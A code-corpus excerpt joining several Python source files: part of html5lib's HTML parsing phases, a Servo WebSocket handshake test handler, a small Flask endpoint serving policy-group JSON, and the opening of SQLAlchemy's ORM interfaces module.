return not self.tree.elementInScope("tr", variant="table")
# the rest
def processEOF(self):
self.parser.phases["inTable"].processEOF()
def processSpaceCharacters(self, token):
return self.parser.phases["inTable"].processSpaceCharacters(token)
def processCharacters(self, token):
return self.parser.phases["inTable"].processCharacters(token)
def startTagTableCell(self, token):
self.clearStackToTableRowContext()
self.tree.insertElement(token)
self.parser.phase = self.parser.phases["inCell"]
self.tree.activeFormattingElements.append(Marker)
def startTagTableOther(self, token):
ignoreEndTag = self.ignoreEndTagTr()
self.endTagTr(impliedTagToken("tr"))
# XXX how are we sure it's always ignored in the innerHTML case?
if not ignoreEndTag:
return token
def startTagOther(self, token):
return self.parser.phases["inTable"].processStartTag(token)
def endTagTr(self, token):
if not self.ignoreEndTagTr():
self.clearStackToTableRowContext()
self.tree.openElements.pop()
self.parser.phase = self.parser.phases["inTableBody"]
else:
# innerHTML case
assert self.parser.innerHTML
self.parser.parseError()
def endTagTable(self, token):
ignoreEndTag = self.ignoreEndTagTr()
self.endTagTr(impliedTagToken("tr"))
# Reprocess the current tag if the tr end tag was not ignored
# XXX how are we sure it's always ignored in the innerHTML case?
if not ignoreEndTag:
return token
def endTagTableRowGroup(self, token):
if self.tree.elementInScope(token["name"], variant="table"):
self.endTagTr(impliedTagToken("tr"))
return token
else:
self.parser.parseError()
def endTagIgnore(self, token):
self.parser.parseError("unexpected-end-tag-in-table-row",
{"name": token["name"]})
def endTagOther(self, token):
return self.parser.phases["inTable"].processEndTag(token)
class InCellPhase(Phase):
# http://www.whatwg.org/specs/web-apps/current-work/#in-cell
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
(("caption", "col", "colgroup", "tbody", "td", "tfoot", "th",
"thead", "tr"), self.startTagTableOther)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
(("td", "th"), self.endTagTableCell),
(("body", "caption", "col", "colgroup", "html"), self.endTagIgnore),
(("table", "tbody", "tfoot", "thead", "tr"), self.endTagImply)
])
self.endTagHandler.default = self.endTagOther
# helper
def closeCell(self):
if self.tree.elementInScope("td", variant="table"):
self.endTagTableCell(impliedTagToken("td"))
elif self.tree.elementInScope("th", variant="table"):
self.endTagTableCell(impliedTagToken("th"))
# the rest
def processEOF(self):
self.parser.phases["inBody"].processEOF()
def processCharacters(self, token):
return self.parser.phases["inBody"].processCharacters(token)
def startTagTableOther(self, token):
if (self.tree.elementInScope("td", variant="table") or
self.tree.elementInScope("th", variant="table")):
self.closeCell()
return token
else:
# innerHTML case
assert self.parser.innerHTML
self.parser.parseError()
def startTagOther(self, token):
return self.parser.phases["inBody"].processStartTag(token)
def endTagTableCell(self, token):
if self.tree.elementInScope(token["name"], variant="table"):
self.tree.generateImpliedEndTags(token["name"])
if self.tree.openElements[-1].name != token["name"]:
self.parser.parseError("unexpected-cell-end-tag",
{"name": token["name"]})
while True:
node = self.tree.openElements.pop()
if node.name == token["name"]:
break
else:
self.tree.openElements.pop()
self.tree.clearActiveFormattingElements()
self.parser.phase = self.parser.phases["inRow"]
else:
self.parser.parseError("unexpected-end-tag", {"name": token["name"]})
def endTagIgnore(self, token):
self.parser.parseError("unexpected-end-tag", {"name": token["name"]})
def endTagImply(self, token):
if self.tree.elementInScope(token["name"], variant="table"):
self.closeCell()
return token
else:
# sometimes innerHTML case
self.parser.parseError()
def endTagOther(self, token):
return self.parser.phases["inBody"].processEndTag(token)
class InSelectPhase(Phase):
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
("option", self.startTagOption),
("optgroup", self.startTagOptgroup),
("select", self.startTagSelect),
(("input", "keygen", "textarea"), self.startTagInput),
("script", self.startTagScript)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
("option", self.endTagOption),
("optgroup", self.endTagOptgroup),
("select", self.endTagSelect)
])
self.endTagHandler.default = self.endTagOther
# http://www.whatwg.org/specs/web-apps/current-work/#in-select
def processEOF(self):
if self.tree.openElements[-1].name != "html":
self.parser.parseError("eof-in-select")
else:
assert self.parser.innerHTML
def processCharacters(self, token):
if token["data"] == "\u0000":
return
self.tree.insertText(token["data"])
def startTagOption(self, token):
# We need to imply </option> if <option> is the current node.
if self.tree.openElements[-1].name == "option":
self.tree.openElements.pop()
self.tree.insertElement(token)
def startTagOptgroup(self, token):
if self.tree.openElements[-1].name == "option":
self.tree.openElements.pop()
if self.tree.openElements[-1].name == "optgroup":
self.tree.openElements.pop()
self.tree.insertElement(token)
def startTagSelect(self, token):
self.parser.parseError("unexpected-select-in-select")
self.endTagSelect(impliedTagToken("select"))
def startTagInput(self, token):
self.parser.parseError("unexpected-input-in-select")
if self.tree.elementInScope("select", variant="select"):
self.endTagSelect(impliedTagToken("select"))
return token
else:
assert self.parser.innerHTML
def startTagScript(self, token):
return self.parser.phases["inHead"].processStartTag(token)
def startTagOther(self, token):
self.parser.parseError("unexpected-start-tag-in-select",
{"name": token["name"]})
def endTagOption(self, token):
if self.tree.openElements[-1].name == "option":
self.tree.openElements.pop()
else:
self.parser.parseError("unexpected-end-tag-in-select",
{"name": "option"})
def endTagOptgroup(self, token):
# </optgroup> implicitly closes <option>
if (self.tree.openElements[-1].name == "option" and
self.tree.openElements[-2].name == "optgroup"):
self.tree.openElements.pop()
# It also closes </optgroup>
if self.tree.openElements[-1].name == "optgroup":
self.tree.openElements.pop()
# But nothing else
else:
self.parser.parseError("unexpected-end-tag-in-select",
{"name": "optgroup"})
def endTagSelect(self, token):
if self.tree.elementInScope("select", variant="select"):
node = self.tree.openElements.pop()
while node.name != "select":
node = self.tree.openElements.pop()
self.parser.resetInsertionMode()
else:
# innerHTML case
assert self.parser.innerHTML
self.parser.parseError()
def endTagOther(self, token):
self.parser.parseError("unexpected-end-tag-in-select",
{"name": token["name"]})
class InSelectInTablePhase(Phase):
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
(("caption", "table", "tbody", "tfoot", "thead", "tr", "td", "th"),
self.startTagTable)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
(("caption", "table", "tbody", "tfoot", "thead", "tr", "td", "th"),
self.endTagTable)
])
self.endTagHandler.default = self.endTagOther
def processEOF(self):
self.parser.phases["inSelect"].processEOF()
def processCharacters(self, token):
return self.parser.phases["inSelect"].processCharacters(token)
def startTagTable(self, token):
self.parser.parseError("unexpected-table-element-start-tag-in-select-in-table", {"name": token["name"]})
self.endTagOther(impliedTagToken("select"))
return token
def startTagOther(self, token):
return self.parser.phases["inSelect"].processStartTag(token)
def endTagTable(self, token):
self.parser.parseError("unexpected-table-element-end-tag-in-select-in-table", {"name": token["name"]})
if self.tree.elementInScope(token["name"], variant="table"):
self.endTagOther(impliedTagToken("select"))
return token
def endTagOther(self, token):
return self.parser.phases["inSelect"].processEndTag(token)
class InForeignContentPhase(Phase):
breakoutElements = frozenset(["b", "big", "blockquote", "body", "br",
"center", "code", "dd", "div", "dl", "dt",
"em", "embed", "h1", "h2", "h3",
"h4", "h5", "h6", "head", "hr", "i", "img",
"li", "listing", "menu", "meta", "nobr",
"ol", "p", "pre", "ruby", "s", "small",
"span", "strong", "strike", "sub", "sup",
"table", "tt", "u", "ul", "var"])
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
def adjustSVGTagNames(self, token):
replacements = {"altglyph": "altGlyph",
"altglyphdef": "altGlyphDef",
"altglyphitem": "altGlyphItem",
"animatecolor": "animateColor",
"animatemotion": "animateMotion",
"animatetransform": "animateTransform",
"clippath": "clipPath",
"feblend": "feBlend",
"fecolormatrix": "feColorMatrix",
"fecomponenttransfer": "feComponentTransfer",
"fecomposite": "feComposite",
"feconvolvematrix": "feConvolveMatrix",
"fediffuselighting": "feDiffuseLighting",
"fedisplacementmap": "feDisplacementMap",
"fedistantlight": "feDistantLight",
"feflood": "feFlood",
"fefunca": "feFuncA",
"fefuncb": "feFuncB",
"fefuncg": "feFuncG",
"fefuncr": "feFuncR",
"fegaussianblur": "feGaussianBlur",
"feimage": "feImage",
"femerge": "feMerge",
"femergenode": "feMergeNode",
"femorphology": "feMorphology",
"feoffset": "feOffset",
"fepointlight": "fePointLight",
"fespecularlighting": "feSpecularLighting",
"fespotlight": "feSpotLight",
"fetile": "feTile",
"feturbulence": "feTurbulence",
"foreignobject": "foreignObject",
"glyphref": "glyphRef",
"lineargradient": "linearGradient",
"radialgradient": "radialGradient",
"textpath": "textPath"}
if token["name"] in replacements:
token["name"] = replacements[token["name"]]
def processCharacters(self, token):
if token["data"] == "\u0000":
token["data"] = "\uFFFD"
elif (self.parser.framesetOK and
any(char not in spaceCharacters for char in token["data"])):
self.parser.framesetOK = False
Phase.processCharacters(self, token)
def processStartTag(self, token):
currentNode = self.tree.openElements[-1]
if (token["name"] in self.breakoutElements or
(token["name"] == "font" and
set(token["data"].keys()) & set(["color", "face", "size"]))):
self.parser.parseError("unexpected-html-element-in-foreign-content",
{"name": token["name"]})
while (self.tree.openElements[-1].namespace !=
self.tree.defaultNamespace and
not self.parser.isHTMLIntegrationPoint(self.tree.openElements[-1]) and
not self.parser.isMathMLTextIntegrationPoint(self.tree.openElements[-1])):
self.tree.openElements.pop()
return token
else:
if currentNode.namespace == namespaces["mathml"]:
self.parser.adjustMathMLAttributes(token)
elif currentNode.namespace == namespaces["svg"]:
self.adjustSVGTagNames(token)
self.parser.adjustSVGAttributes(token)
self.parser.adjustForeignAttributes(token)
token["namespace"] = currentNode.namespace
self.tree.insertElement(token)
if token["selfClosing"]:
self.tree.openElements.pop()
token["selfClosingAcknowledged"] = True
def processEndTag(self, token):
nodeIndex = len(self.tree.openElements) - 1
node = self.tree.openElements[-1]
if node.name.translate(asciiUpper2Lower) != token["name"]:
self.parser.parseError("unexpected-end-tag", {"name": token["name"]})
while True:
if node.name.translate(asciiUpper2Lower) == token["name"]:
# XXX this isn't in the spec but it seems necessary
if self.parser.phase == self.parser.phases["inTableText"]:
self.parser.phase.flushCharacters()
self.parser.phase = self.parser.phase.originalPhase
while self.tree.openElements.pop() != node:
assert self.tree.openElements
new_token = None
break
nodeIndex -= 1
node = self.tree.openElements[nodeIndex]
if node.namespace != self.tree.defaultNamespace:
continue
else:
new_token = self.parser.phase.processEndTag(token)
break
return new_token
class AfterBodyPhase(Phase):
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([("html", self.endTagHtml)])
self.endTagHandler.default = self.endTagOther
def processEOF(self):
# Stop parsing
pass
def processComment(self, token):
# This is needed because data is to be appended to the <html> element
# here and not to whatever is currently open.
self.tree.insertComment(token, self.tree.openElements[0])
def processCharacters(self, token):
self.parser.parseError("unexpected-char-after-body")
self.parser.phase = self.parser.phases["inBody"]
return token
def startTagHtml(self, token):
return self.parser.phases["inBody"].processStartTag(token)
def startTagOther(self, token):
self.parser.parseError("unexpected-start-tag-after-body",
{"name": token["name"]})
self.parser.phase = self.parser.phases["inBody"]
return token
def endTagHtml(self, name):
if self.parser.innerHTML:
self.parser.parseError("unexpected-end-tag-after-body-innerhtml")
else:
self.parser.phase = self.parser.phases["afterAfterBody"]
def endTagOther(self, token):
self.parser.parseError("unexpected-end-tag-after-body",
{"name": token["name"]})
self.parser.phase = self.parser.phases["inBody"]
return token
class InFramesetPhase(Phase):
# http://www.whatwg.org/specs/web-apps/current-work/#in-frameset
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
("frameset", self.startTagFrameset),
("frame", self.startTagFrame),
("noframes", self.startTagNoframes)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
("frameset", self.endTagFrameset)
])
self.endTagHandler.default = self.endTagOther
def processEOF(self):
if self.tree.openElements[-1].name != "html":
self.parser.parseError("eof-in-frameset")
else:
assert self.parser.innerHTML
def processCharacters(self, token):
self.parser.parseError("unexpected-char-in-frameset")
def startTagFrameset(self, token):
self.tree.insertElement(token)
def startTagFrame(self, token):
self.tree.insertElement(token)
self.tree.openElements.pop()
def startTagNoframes(self, token):
return self.parser.phases["inBody"].processStartTag(token)
def startTagOther(self, token):
self.parser.parseError("unexpected-start-tag-in-frameset",
{"name": token["name"]})
def endTagFrameset(self, token):
if self.tree.openElements[-1].name == "html":
# innerHTML case
self.parser.parseError("unexpected-frameset-in-frameset-innerhtml")
else:
self.tree.openElements.pop()
if (not self.parser.innerHTML and
self.tree.openElements[-1].name != "frameset"):
# If we're not in innerHTML mode and the current node is not a
# "frameset" element (anymore) then switch.
self.parser.phase = self.parser.phases["afterFrameset"]
def endTagOther(self, token):
self.parser.parseError("unexpected-end-tag-in-frameset",
{"name": token["name"]})
class AfterFramesetPhase(Phase):
# http://www.whatwg.org/specs/web-apps/current-work/#after3
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
("noframes", self.startTagNoframes)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
("html", self.endTagHtml)
])
self.endTagHandler.default = self.endTagOther
def processEOF(self):
# Stop parsing
pass
def processCharacters(self, token):
self.parser.parseError("unexpected-char-after-frameset")
def startTagNoframes(self, token):
return self.parser.phases["inHead"].processStartTag(token)
def startTagOther(self, token):
self.parser.parseError("unexpected-start-tag-after-frameset",
{"name": token["name"]})
def endTagHtml(self, token):
self.parser.phase = self.parser.phases["afterAfterFrameset"]
def endTagOther(self, token):
self.parser.parseError("unexpected-end-tag-after-frameset",
{"name": token["name"]})
class AfterAfterBodyPhase(Phase):
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml)
])
self.startTagHandler.default = self.startTagOther
def processEOF(self):
pass
def processComment(self, token):
self.tree.insertComment(token, self.tree.document)
def processSpaceCharacters(self, token):
return self.parser.phases["inBody"].processSpaceCharacters(token)
def processCharacters(self, token):
self.parser.parseError("expected-eof-but-got-char")
self.parser.phase = self.parser.phases["inBody"]
return token
def startTagHtml(self, token):
return self.parser.phases["inBody"].processStartTag(token)
def startTagOther(self, token):
self.parser.parseError("expected-eof-but-got-start-tag",
{"name": token["name"]})
self.parser.phase = self.parser.phases["inBody"]
return token
def processEndTag(self, token):
self.parser.parseError("expected-eof-but-got-end-tag",
{"name": token["name"]})
self.parser.phase = self.parser.phases["inBody"]
return token
class AfterAfterFramesetPhase(Phase):
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
("noframes", self.startTagNoFrames)
])
self.startTagHandler.default = self.startTagOther
def processEOF(self):
pass
def processComment(self, token):
self.tree.insertComment(token, self.tree.document)
def processSpaceCharacters(self, token):
return self.parser.phases["inBody"].processSpaceCharacters(token)
def processCharacters(self, token):
self.parser.parseError("expected-eof-but-got-char")
def startTagHtml(self, token):
return self.parser.phases["inBody"].processStartTag(token)
def startTagNoFrames(self, token):
return self.parser.phases["inHead"].processStartTag(token)
def startTagOther(self, token):
self.parser.parseError("expected-eof-but-got-start-tag",
{"name": token["name"]})
def processEndTag(self, token):
self.parser.parseError("expected-eof-but-got-end-tag",
{"name": token["name"]})
# pylint:enable=unused-argument
return {
"initial": InitialPhase,
"beforeHtml": BeforeHtmlPhase,
"beforeHead": BeforeHeadPhase,
"inHead": InHeadPhase,
"inHeadNoscript": InHeadNoscriptPhase,
"afterHead": AfterHeadPhase,
"inBody": InBodyPhase,
"text": TextPhase,
"inTable": InTablePhase,
"inTableText": InTableTextPhase,
"inCaption": InCaptionPhase,
"inColumnGroup": InColumnGroupPhase,
"inTableBody": InTableBodyPhase,
"inRow": InRowPhase,
"inCell": InCellPhase,
"inSelect": InSelectPhase,
"inSelectInTable": InSelectInTablePhase,
"inForeignContent": InForeignContentPhase,
"afterBody": AfterBodyPhase,
"inFrameset": InFramesetPhase,
"afterFrameset": AfterFramesetPhase,
"afterAfterBody": AfterAfterBodyPhase,
"afterAfterFrameset": AfterAfterFramesetPhase,
# XXX after after frameset
}
def adjust_attributes(token, replacements):
if PY3 or _utils.PY27:
needs_adjustment = viewkeys(token['data']) & viewkeys(replacements)
else:
needs_adjustment = frozenset(token['data']) & frozenset(replacements)
if needs_adjustment:
token['data'] = OrderedDict((replacements.get(k, k), v)
for k, v in token['data'].items())
def impliedTagToken(name, type="EndTag", attributes=None,
selfClosing=False):
if attributes is None:
attributes = {}
return {"type": tokenTypes[type], "name": name, "data": attributes,
"selfClosing": selfClosing}
class ParseError(Exception):
"""Error in parsed document"""
pass
|
Nashenas88/servo | refs/heads/master | tests/wpt/web-platform-tests/websockets/handlers/handshake_no_protocol_wsh.py | 215 | #!/usr/bin/python
from mod_pywebsocket import common, msgutil, util
from mod_pywebsocket.handshake import hybi
def web_socket_do_extra_handshake(request):
request.connection.write('HTTP/1.1 101 Switching Protocols:\x0D\x0AConnection: Upgrade\x0D\x0AUpgrade: WebSocket\x0D\x0ASec-WebSocket-Origin: '+request.ws_origin+'\x0D\x0ASec-WebSocket-Accept: '+hybi.compute_accept(request.headers_in.get(common.SEC_WEBSOCKET_KEY_HEADER))[0]+'\x0D\x0A\x0D\x0A')
return
def web_socket_transfer_data(request):
while True:
return
|
CallenDevens/Elemetry | refs/heads/master | elemetry-service.py | 1 | from flask import Flask, jsonify,render_template,request
import json
app = Flask(__name__)
@app.route('/policy-groups')
def getPolicyGroup():
groups = [
{"name":"POL1","collector":"COL1","policy":"policy1"},
{"name":"POL2","collector":"COL2","policy":"policy2"},
{"name":"POL3","collector":"COL3","policy":"policy3"},
{"name":"POL4","collector":"COL4","policy":"policy4"},
];
return json.dumps(groups) |
mcus/SickRage | refs/heads/master | lib/sqlalchemy/orm/interfaces.py | 77 | # orm/interfaces.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""
Contains various base classes used throughout the ORM.
Defines the now deprecated ORM extension classes as well
as ORM internals.
Other than the deprecated extensions, this module and the
classes within should be considered mostly private.
"""
from __future__ import absolute_import
from .. import exc as sa_exc, util, inspect
from ..sql import operators
from collections import deque
from .base import ONETOMANY, MANYTOONE, MANYTOMANY, EXT_CONTINUE, EXT_STOP, NOT_EXTENSION
from .base import _InspectionAttr, _MappedAttribute
from .path_registry import PathRegistry
import collections
__all__ = (
'AttributeExtension',
'EXT_CONTINUE',
'EXT_STOP',
'ONETOMANY',
'MANYTOMANY',
'MANYTOONE',
'NOT_EXTENSION',
'LoaderStrategy',
'MapperExtension',
'MapperOption',
'MapperProperty',
'PropComparator',
'SessionExtension',
'StrategizedProperty',
)
class MapperProperty(_MappedAttribute, _InspectionAttr):
"""Manage the relationship of a ``Mapper`` to a single class
attribute, as well as that attribute as it appears on individual
instances of the class, including attribute instrumentation,
attribute access, loading behavior, and dependency calculations.
The most common occurrences of :class:`.MapperProperty` are the
mapped :class:`.Column`, which is represented in a mapping as
an instance of :class:`.ColumnProperty`,
and a reference to another class produced by :func:`.relationship`,
represented in the mapping as an instance of
:class:`.RelationshipProperty`.
"""
cascade = frozenset()
"""The set of 'cascade' attribute names.
This collection is checked before the 'cascade_iterator' method is called.
"""
is_property = True
def setup(self, context, entity, path, adapter, **kwargs):
"""Called by Query for the purposes of constructing a SQL statement.
Each MapperProperty associated with the target mapper processes the
statement referenced by the query context, adding columns and/or
criterion as appropriate.
"""
pass
def create_row_processor(self, context, path,
mapper, row, adapter):
"""Return a 3-tuple consisting of three row processing functions.
"""
return None, None, None
def cascade_iterator(self, type_, state, visited_instances=None,
halt_on=None):
"""Iterate through instances related to the given instance for
a particular 'cascade', starting with this MapperProperty.
Return an iterator3-tuples (instance, mapper, state).
Note that the 'cascade' collection on this MapperProperty is
checked first for the given type before cascade_iterator is called.
See PropertyLoader for the related instance implementation.
"""
return iter(())
def set_parent(self, parent, init):
self.parent = parent
def instrument_class(self, mapper): # pragma: no-coverage
raise NotImplementedError()
@util.memoized_property
def info(self):
"""Info dictionary associated with the object, allowing user-defined
data to be associated with this :class:`.MapperProperty`.
The dictionary is generated when first accessed. Alternatively,
it can be specified as a constructor argument to the
:func:`.column_property`, :func:`.relationship`, or :func:`.composite`
functions.
.. versionadded:: 0.8 Added support for .info to all
:class:`.MapperProperty` subclasses.
.. seealso::
:attr:`.QueryableAttribute.info`
:attr:`.SchemaItem.info`
"""
return {}
_configure_started = False
_configure_finished = False
def init(self):
"""Called after all mappers are created to assemble
relationships between mappers and perform other post-mapper-creation
initialization steps.
"""
self._configure_started = True
self.do_init()
self._configure_finished = True
@property
def class_attribute(self):
"""Return the class-bound descriptor corresponding to this
:class:`.MapperProperty`.
This is basically a ``getattr()`` call::
return getattr(self.parent.class_, self.key)
I.e. if this :class:`.MapperProperty` were named ``addresses``,
and the class to which it is mapped is ``User``, this sequence
is possible::
>>> from sqlalchemy import inspect
>>> mapper = inspect(User)
>>> addresses_property = mapper.attrs.addresses
>>> addresses_property.class_attribute is User.addresses
True
>>> User.addresses.property is addresses_property
True
"""
return getattr(self.parent.class_, self.key)
def do_init(self):
"""Perform subclass-specific initialization post-mapper-creation
steps.
This is a template method called by the ``MapperProperty``
object's init() method.
"""
pass
def post_instrument_class(self, mapper):
"""Perform instrumentation adjustments that need to occur
after init() has completed.
"""
pass
def is_primary(self):
"""Return True if this ``MapperProperty``'s mapper is the
primary mapper for its class.
This flag is used to indicate that the ``MapperProperty`` can
define attribute instrumentation for the class at the class
level (as opposed to the individual instance level).
"""
return not self.parent.non_primary
def merge(self, session, source_state, source_dict, dest_state,
dest_dict, load, _recursive):
"""Merge the attribute represented by this ``MapperProperty``
from source to destination object"""
pass
def compare(self, operator, value, **kw):
"""Return a compare operation for the columns represented by
this ``MapperProperty`` to the given value, which may be a
column value or an instance. 'operator' is an operator from
the operators module, or from sql.Comparator.
By default uses the PropComparator attached to this MapperProperty
under the attribute name "comparator".
"""
return operator(self.comparator, value)
def __repr__(self):
return '<%s at 0x%x; %s>' % (
self.__class__.__name__,
id(self), getattr(self, 'key', 'no key'))
class PropComparator(operators.ColumnOperators):
"""Defines boolean, comparison, and other operators for
:class:`.MapperProperty` objects.
SQLAlchemy allows for operators to
be redefined at both the Core and ORM level. :class:`.PropComparator`
is the base class of operator redefinition for ORM-level operations,
including those of :class:`.ColumnProperty`,
:class:`.RelationshipProperty`, and :class:`.CompositeProperty`.
.. note:: With the advent of Hybrid properties introduced in SQLAlchemy
0.7, as well as Core-level operator redefinition in
SQLAlchemy 0.8, the use case for user-defined :class:`.PropComparator`
instances is extremely rare. See :ref:`hybrids_toplevel` as well
as :ref:`types_operators`.
User-defined subclasses of :class:`.PropComparator` may be created. The
built-in Python comparison and math operator methods, such as
:meth:`.operators.ColumnOperators.__eq__`,
:meth:`.operators.ColumnOperators.__lt__`, and
:meth:`.operators.ColumnOperators.__add__`, can be overridden to provide
new operator behavior. The custom :class:`.PropComparator` is passed to
the :class:`.MapperProperty` instance via the ``comparator_factory``
argument. In each case,
the appropriate subclass of :class:`.PropComparator` should be used::
# definition of custom PropComparator subclasses
from sqlalchemy.orm.properties import \\
ColumnProperty,\\
CompositeProperty,\\
RelationshipProperty
class MyColumnComparator(ColumnProperty.Comparator):
def __eq__(self, other):
return self.__clause_element__() == other
class MyRelationshipComparator(RelationshipProperty.Comparator):
def any(self, expression):
"define the 'any' operation"
# ...
class MyCompositeComparator(CompositeProperty.Comparator):
def __gt__(self, other):
"redefine the 'greater than' operation"
return sql.and_(*[a>b for a, b in
zip(self.__clause_element__().clauses,
other.__composite_values__())])
# application of custom PropComparator subclasses
from sqlalchemy.orm import column_property, relationship, composite
from sqlalchemy import Column, String
class SomeMappedClass(Base):
some_column = column_property(Column("some_column", String),
comparator_factory=MyColumnComparator)
some_relationship = relationship(SomeOtherClass,
comparator_factory=MyRelationshipComparator)
some_composite = composite(
Column("a", String), Column("b", String),
comparator_factory=MyCompositeComparator
)
Note that for column-level operator redefinition, it's usually
simpler to define the operators at the Core level, using the
:attr:`.TypeEngine.comparator_factory` attribute. See
:ref:`types_operators` for more detail.
See also:
:class:`.ColumnProperty.Comparator`
:class:`.RelationshipProperty.Comparator`
:class:`.CompositeProperty.Comparator`
:class:`.ColumnOperators`
:ref:`types_operators`
:attr:`.TypeEngine.comparator_factory`
"""
def __init__(self, prop, parentmapper, adapt_to_entity=None):
self.prop = self.property = prop
self._parentmapper = parentmapper
self._adapt_to_entity = adapt_to_entity
def __clause_element__(self):
raise NotImplementedError("%r" % self)
def _query_clause_element(self):
return self.__clause_element__()
def adapt_to_entity(self, adapt_to_entity):
"""Return a copy of this PropComparator which will use the given
:class:`.AliasedInsp` to produce corresponding expressions.
"""
return self.__class__(self.prop, self._parentmapper, adapt_to_entity)
@property
def adapter(self):
"""Produce a callable that adapts column expressions
to suit an aliased version of this comparator.
"""
if self._adapt_to_entity is None:
return None
else:
return self._adapt_to_entity._adapt_element
@util.memoized_property
def info(self):
return self.property.info
@staticmethod
def any_op(a, b, **kwargs):
return a.any(b, **kwargs)
@staticmethod
def has_op(a, b, **kwargs):
return a.has(b, **kwargs)
@staticmethod
def of_type_op(a, class_):
return a.of_type(class_)
def of_type(self, class_):
"""Redefine this object in terms of a polymorphic subclass.
Returns a new PropComparator from which further criterion can be
evaluated.
e.g.::
query.join(Company.employees.of_type(Engineer)).\\
filter(Engineer.name=='foo')
:param \class_: a class or mapper indicating that criterion will be
against this specific subclass.
"""
return self.operate(PropComparator.of_type_op, class_)
def any(self, criterion=None, **kwargs):
"""Return true if this collection contains any member that meets the
given criterion.
The usual implementation of ``any()`` is
:meth:`.RelationshipProperty.Comparator.any`.
:param criterion: an optional ClauseElement formulated against the
member class' table or attributes.
:param \**kwargs: key/value pairs corresponding to member class
attribute names which will be compared via equality to the
corresponding values.
"""
return self.operate(PropComparator.any_op, criterion, **kwargs)
def has(self, criterion=None, **kwargs):
"""Return true if this element references a member which meets the
given criterion.
The usual implementation of ``has()`` is
:meth:`.RelationshipProperty.Comparator.has`.
:param criterion: an optional ClauseElement formulated against the
member class' table or attributes.
:param \**kwargs: key/value pairs corresponding to member class
attribute names which will be compared via equality to the
corresponding values.
"""
return self.operate(PropComparator.has_op, criterion, **kwargs)
class StrategizedProperty(MapperProperty):
"""A MapperProperty which uses selectable strategies to affect
loading behavior.
There is a single strategy selected by default. Alternate
strategies can be selected at Query time through the usage of
``StrategizedOption`` objects via the Query.options() method.
"""
strategy_wildcard_key = None
def _get_context_loader(self, context, path):
load = None
# use EntityRegistry.__getitem__()->PropRegistry here so
# that the path is stated in terms of our base
search_path = dict.__getitem__(path, self)
# search among: exact match, "attr.*", "default" strategy
# if any.
for path_key in (
search_path._loader_key,
search_path._wildcard_path_loader_key,
search_path._default_path_loader_key
):
if path_key in context.attributes:
load = context.attributes[path_key]
break
return load
def _get_strategy(self, key):
try:
return self._strategies[key]
except KeyError:
cls = self._strategy_lookup(*key)
self._strategies[key] = self._strategies[cls] = strategy = cls(self)
return strategy
def _get_strategy_by_cls(self, cls):
return self._get_strategy(cls._strategy_keys[0])
def setup(self, context, entity, path, adapter, **kwargs):
loader = self._get_context_loader(context, path)
if loader and loader.strategy:
strat = self._get_strategy(loader.strategy)
else:
strat = self.strategy
strat.setup_query(context, entity, path, loader, adapter, **kwargs)
def create_row_processor(self, context, path, mapper, row, adapter):
loader = self._get_context_loader(context, path)
if loader and loader.strategy:
strat = self._get_strategy(loader.strategy)
else:
strat = self.strategy
return strat.create_row_processor(context, path, loader,
mapper, row, adapter)
def do_init(self):
self._strategies = {}
self.strategy = self._get_strategy_by_cls(self.strategy_class)
def post_instrument_class(self, mapper):
if self.is_primary() and \
not mapper.class_manager._attr_has_impl(self.key):
self.strategy.init_class_attribute(mapper)
_strategies = collections.defaultdict(dict)
@classmethod
def strategy_for(cls, **kw):
def decorate(dec_cls):
dec_cls._strategy_keys = []
key = tuple(sorted(kw.items()))
cls._strategies[cls][key] = dec_cls
dec_cls._strategy_keys.append(key)
return dec_cls
return decorate
@classmethod
def _strategy_lookup(cls, *key):
for prop_cls in cls.__mro__:
if prop_cls in cls._strategies:
strategies = cls._strategies[prop_cls]
try:
return strategies[key]
except KeyError:
pass
raise Exception("can't locate strategy for %s %s" % (cls, key))
class MapperOption(object):
"""Describe a modification to a Query."""
propagate_to_loaders = False
"""if True, indicate this option should be carried along
Query object generated by scalar or object lazy loaders.
"""
def process_query(self, query):
pass
def process_query_conditionally(self, query):
"""same as process_query(), except that this option may not
apply to the given query.
Used when secondary loaders resend existing options to a new
Query."""
self.process_query(query)
class LoaderStrategy(object):
"""Describe the loading behavior of a StrategizedProperty object.
The ``LoaderStrategy`` interacts with the querying process in three
ways:
* it controls the configuration of the ``InstrumentedAttribute``
placed on a class to handle the behavior of the attribute. this
may involve setting up class-level callable functions to fire
off a select operation when the attribute is first accessed
(i.e. a lazy load)
* it processes the ``QueryContext`` at statement construction time,
where it can modify the SQL statement that is being produced.
Simple column attributes may add their represented column to the
list of selected columns, *eager loading* properties may add
``LEFT OUTER JOIN`` clauses to the statement.
* It produces "row processor" functions at result fetching time.
These "row processor" functions populate a particular attribute
on a particular mapped instance.
"""
def __init__(self, parent):
self.parent_property = parent
self.is_class_level = False
self.parent = self.parent_property.parent
self.key = self.parent_property.key
def init_class_attribute(self, mapper):
pass
